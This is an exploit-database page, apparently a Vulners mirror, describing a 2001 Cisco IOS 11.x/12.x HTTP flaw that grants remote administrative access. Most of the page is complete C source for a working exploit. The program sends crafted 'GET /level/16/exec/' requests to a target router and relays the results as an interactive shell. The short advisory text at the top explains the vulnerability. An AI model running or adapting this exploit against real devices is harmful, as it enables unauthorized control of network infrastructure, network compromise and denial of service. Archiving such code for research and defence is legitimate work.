Lucene search
K

Cisco IOS 11.x12.x - HTTP Configuration Arbitrary Administrative Access (2)

🗓️ 27 Jun 2001 00:00:00Reported by Eliel C. SardanonsType 
exploitpack
 exploitpack
👁 12 Views

Full remote administrative access can be gained on affected Cisco IOS devices via HTTP requests.

Code
/*
source: https://www.securityfocus.com/bid/2936/info
 
IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches.
 
It is possible to gain full remote administrative access on devices using affected releases of IOS. By using a URL of http://router.address/level/$NUMBER/exec/.... where $NUMBER is an integer between 16 and 99, it is possible for a remote user to gain full administrative access.
 
This problem makes it possible for a remote user to gain full administrative privileges, which may lead to further compromise of the network or result in a denial of service. 
*/

/* Coded and backdored by Eliel C. Sardanons <[email protected]>
 * to compile:
 * bash# gcc -o cisco cisco.c 
 */

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define HTTP_PORT 80
#define PROMPT "\ncisco$ "

int usage (char *progname) {
        printf ("Usage:\n\t%s server\n", progname);
        exit(-1);
}                                                               
        
int main (int argc, char *argv[]) {
        struct hostent *he;
        struct sockaddr_in sin;
        int sck, i;
        char command[256], buffer[512];
        if (argc < 2)
                usage(argv[0]);
        if ((he = gethostbyname(argv[1])) == NULL) {
                perror("host()");
                exit(-1);
        }
        sin.sin_family = AF_INET;
        sin.sin_port = htons(HTTP_PORT);
        sin.sin_addr = *((struct in_addr *)he->h_addr);
        while (1) {
                if ((sck = socket (AF_INET, SOCK_STREAM, 6)) <= 0) {
                        perror("socket()");
                        exit(-1);
                }
                if ((connect(sck, (struct sockaddr *)&sin, sizeof(sin))) < 0) {
                        perror ("connect()");
                        exit(-1);
                }
                printf (PROMPT);
                fgets (command, 256, stdin);
                if (strlen(command) == 1) 
                        break;
                for (i=0;i<strlen(command);i++) {
                        if (command[i] == ' ')
                                command[i] = '/';
                }
                snprintf (buffer, sizeof(buffer), 
                                                        "GET /level/16/exec/%s HTTP/1.0\r\n\r\n", command); 
                write (sck, buffer, strlen(buffer));
                memset (buffer, 0, sizeof(buffer));
                while ((read (sck, buffer, sizeof(buffer))) != 0) {
                        if ((strstr(buffer, "CR</A>")) != 0) {
                                printf ("You need to complete the command with more parameters or finish the command with 'CR'\n");
                                memset (buffer, 0, sizeof(buffer));
                                break;
                        } else if ((strstr(buffer, "Unauthorized")) != 0) {
                                printf ("Server not vulnerable\n");
                                exit(-1);
                        } else {
                                printf ("%s", buffer);
                                memset (buffer, 0, sizeof(buffer));
                        }
                 }
        }
        printf ("Thanks...\n");
        exit(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation